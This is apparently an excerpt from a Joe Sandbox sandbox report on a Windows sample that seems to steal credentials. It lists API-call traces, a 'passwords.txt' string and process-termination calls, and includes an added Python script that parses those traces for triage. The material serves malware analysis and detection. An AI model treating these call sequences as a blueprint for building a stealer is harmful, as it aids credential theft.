• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
• String ID:
• API String ID: 838878465-0
• Opcode ID: 882919d8e81d33c751407722a0b8ace999f8bd1d8c44ba410d69c9920007b747
• Instruction ID: fdb7c08e700ed32adb2ae2c2a5ff1a1e710e7b16f925f6ddc77f083c3cc67fa6
• Opcode Fuzzy Hash: 882919d8e81d33c751407722a0b8ace999f8bd1d8c44ba410d69c9920007b747
• Instruction Fuzzy Hash: 6DE1F772C04218AFEF21AFF4EC89AEEBF79AB48700F14456AF215A7152DB3559849F10
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,001B739C,001B680B), ref: 0018A996
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9AE
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9B6
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9C2
• ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9CC
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9DE
• GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9EA
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9F1
• StrStrA.SHLWAPI(0018B7F9,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA02
• StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA1C
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA2F
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA39
• lstrcatA.KERNEL32(00000000,001B73A0,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA45
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA4F
• lstrcatA.KERNEL32(00000000,001B73A4,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA5B
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA68
• lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA70
• lstrcatA.KERNEL32(00000000,001B73A8,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA7C
• StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA8C
• StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA9C
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAAF
  • Part of subcall function 0018A7AD: _memset.LIBCMT ref: 0018A7EA
  • Part of subcall function 0018A7AD: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A805
  • Part of subcall function 0018A7AD: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0018A80D
  • Part of subcall function 0018A7AD: _memmove.LIBCMT ref: 0018A890
• lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AABE
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73AC,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AACA
                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AADA
                                                                                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAEA
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAFD
                                                                                                                                                                          • Part of subcall function 0018A7AD: lstrcatA.KERNEL32(001B6801,001B6803,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8BA
                                                                                                                                                                          • Part of subcall function 0018A7AD: lstrcatA.KERNEL32(001B6801,001B680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8D0
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB0C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73B0,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB18
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73B4,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB24
                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB34
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018AB52
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0018AB81
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
                                                                                                                                                                        • String ID: passwords.txt$p=
                                                                                                                                                                        • API String ID: 1221571796-223136824
                                                                                                                                                                        • Opcode ID: 4f33dfcd56473ae19e2fbf439fda04511e9bda27bba2a54909f6ee6dde53496d
                                                                                                                                                                        • Instruction ID: 392d76300a6e9cb9884d8a0d23135f7a9a146612e8c5dac2852b9ea61c385c30
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f33dfcd56473ae19e2fbf439fda04511e9bda27bba2a54909f6ee6dde53496d
                                                                                                                                                                        • Instruction Fuzzy Hash: F1715B36502115AFDB03BBA4FC89DAE7FBDEF59301F004412FA01AB1A1DB745A059FA2
APIs
  • Part of subcall function 0019076A: StrCmpCA.SHLWAPI(?,?,?,0018886E,?,?,?), ref: 00190773
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018894C
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00192285: _memset.LIBCMT ref: 001922AC
  • Part of subcall function 00192285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00192352
  • Part of subcall function 00192285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00192360
  • Part of subcall function 00192285: CloseHandle.KERNEL32(00000000), ref: 00192367
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
• GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00188AB1
• HeapAlloc.KERNEL32(00000000), ref: 00188AB8
• StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00188BA2
• StrCmpCA.SHLWAPI(?,001B71E0), ref: 00188BBB
• StrCmpCA.SHLWAPI(?,001B71E4), ref: 00188BE3
• lstrlenA.KERNEL32(?), ref: 00188D03
• lstrlenA.KERNEL32(?), ref: 00188D1E
  • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
  • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
• DeleteFileA.KERNEL32(?), ref: 00188D61
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
• String ID: ERROR_V128
• API String ID: 3638656634-2537946777
• Opcode ID: 35c93caf5754e150b9ff98c32d8abd845c60cf5e1e9d3056925f5bc36155416c
• Instruction ID: 47ef3e97d88342a226be93c2e24b35dd8a4e570ec945fc254ad1bf5ae821e744
• Opcode Fuzzy Hash: 35c93caf5754e150b9ff98c32d8abd845c60cf5e1e9d3056925f5bc36155416c
• Instruction Fuzzy Hash: 1FE1E332D01119AFDF12BBA4EC469DD7BB9EF28304F614026F511B70A2DB75AE068F90
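The API lists above are the IDA plugin's rendering of each function's calls; reading them mechanically is the quickest way to surface patterns such as the OpenProcess/TerminateProcess pair inside subcall 00192285 and to decode the access mask the sample requests. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it parses trace lines in the format shown here, groups calls by the function they are attributed to, and decodes the first argument of OpenProcess using the PROCESS_* constants from winnt.h. The TRACE constant is copied from the listing above. Only the leading argument is interpreted, because the trailing entries in these lists (the recurring 0018B7F9 in the lstrcatA calls, for instance) look like stack contents rather than parameters.

```python
"""Parse Joe Sandbox 'APIs' trace lines and surface triage-relevant patterns.

Added example; not part of the Joe Sandbox report or of the analysed sample.
"""
import re
from collections import Counter

# One trace line as rendered in the report. Three shapes occur:
#   • lstrcatA.KERNEL32(00000000,001B73A0,?,?), ref: 0018AA45
#   • Part of subcall function 00192285: OpenProcess.KERNEL32(00001001,...), ref: 00192352
#   • _memset.LIBCMT ref: 0018A7EA                      (no argument list at all)
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# PROCESS_* access rights from winnt.h, used to decode OpenProcess(dwDesiredAccess, ...).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Lines copied verbatim from the report's second function listing above.
TRACE = """\
• Part of subcall function 0019076A: StrCmpCA.SHLWAPI(?,?,?,0018886E,?,?,?), ref: 00190773
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018894C
• Part of subcall function 00192285: _memset.LIBCMT ref: 001922AC
• Part of subcall function 00192285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00192352
• Part of subcall function 00192285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00192360
• Part of subcall function 00192285: CloseHandle.KERNEL32(00000000), ref: 00192367
• GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00188AB1
• HeapAlloc.KERNEL32(00000000), ref: 00188AB8
• StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00188BA2
• Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
• Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
• DeleteFileA.KERNEL32(?), ref: 00188D61
"""


def parse_line(line):
    """Return a dict for one trace line, or None if the line is not a call entry."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [] if args is None else args.split(","),
        "ref": m.group("ref").upper(),
        # None means the call belongs to the listed function itself.
        "subfn": (m.group("subfn") or "").upper() or None,
    }


def parse_trace(text):
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def api_histogram(calls):
    """Count APIs called directly by the listed function (subcall entries excluded)."""
    return Counter(c["api"] for c in calls if c["subfn"] is None)


def literal_args(calls):
    """Arguments the plugin resolved to strings (e.g. ERROR_V128) rather than raw values."""
    return {a for c in calls for a in c["args"] if a and a != "?" and not HEX_RE.match(a)}


def decode_process_access(mask):
    names = [n for bit, n in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def triage(calls):
    """Findings a reviewer would want pulled out of a raw trace."""
    findings = []
    by_fn = {}
    for c in calls:
        by_fn.setdefault(c["subfn"], []).append(c["api"])
    for fn, apis in by_fn.items():
        if "OpenProcess" in apis and "TerminateProcess" in apis:
            findings.append(f"{fn or 'this function'}: opens and terminates a process")
    for c in calls:
        # dwDesiredAccess is the first parameter, the only one decoded here.
        if c["api"] == "OpenProcess" and c["args"] and HEX_RE.match(c["args"][0]):
            rights = decode_process_access(int(c["args"][0], 16))
            findings.append(f"OpenProcess @ {c['ref']}: dwDesiredAccess = {' | '.join(rights)}")
    return findings


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    print(api_histogram(calls))
    print(literal_args(calls))
    for f in triage(calls):
        print(f)
```

Run on the copied lines it reports that subcall 00192285 opens and terminates a process and that the handle is requested with PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION (0x1001), which is the minimal right set for killing a process by PID. Extending TRACE with the first listing lets the same code count the lstrcatA/StrStrA string-building chain there.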
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001A4B6F
• __mtterm.LIBCMT ref: 001A4B7B
  • Part of subcall function 001A483A: DecodePointer.KERNEL32(FFFFFFFF), ref: 001A484B
  • Part of subcall function 001A483A: TlsFree.KERNEL32(FFFFFFFF), ref: 001A4865
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001A4B91
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001A4B9E
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001A4BAB
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001A4BB8
• TlsAlloc.KERNEL32 ref: 001A4C08
• TlsSetValue.KERNEL32(00000000), ref: 001A4C23
• __init_pointers.LIBCMT ref: 001A4C2D
• EncodePointer.KERNEL32 ref: 001A4C3E
• EncodePointer.KERNEL32 ref: 001A4C4B
• EncodePointer.KERNEL32 ref: 001A4C58
• EncodePointer.KERNEL32 ref: 001A4C65
• DecodePointer.KERNEL32(Function_000249BE), ref: 001A4C86
• __calloc_crt.LIBCMT ref: 001A4C9B
• DecodePointer.KERNEL32(00000000), ref: 001A4CB5
• __initptd.LIBCMT ref: 001A4CC0
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001A4CC7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                        • API String ID: 3732613303-3819984048
                                                                                                                                                                        • Opcode ID: 22b304180bacf75122c224b8606549c39c03c5dd717366b2d5519a2503f3a643
                                                                                                                                                                        • Instruction ID: f5bbda84bd503dffc7135ccdb742bf2a29c4d64a24fad907af1251f1980b7568
                                                                                                                                                                        • Opcode Fuzzy Hash: 22b304180bacf75122c224b8606549c39c03c5dd717366b2d5519a2503f3a643
                                                                                                                                                                        • Instruction Fuzzy Hash: 90318F7980B7509BC711AFB9BC096163FA4EB8A720751862BE414D3EB4E7B0D5C0CF50
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 001885D8
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0018862D
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00188634
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001886D2
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 001886EB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 001886F5
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B719C), ref: 00188701
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0018870B
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A0), ref: 00188717
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00188724
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0018872E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A4), ref: 0018873A
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00188747
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00188751
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A8), ref: 0018875D
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0018876A
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00188774
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71AC), ref: 00188780
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71B0), ref: 0018878C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001887C5
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00188812
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
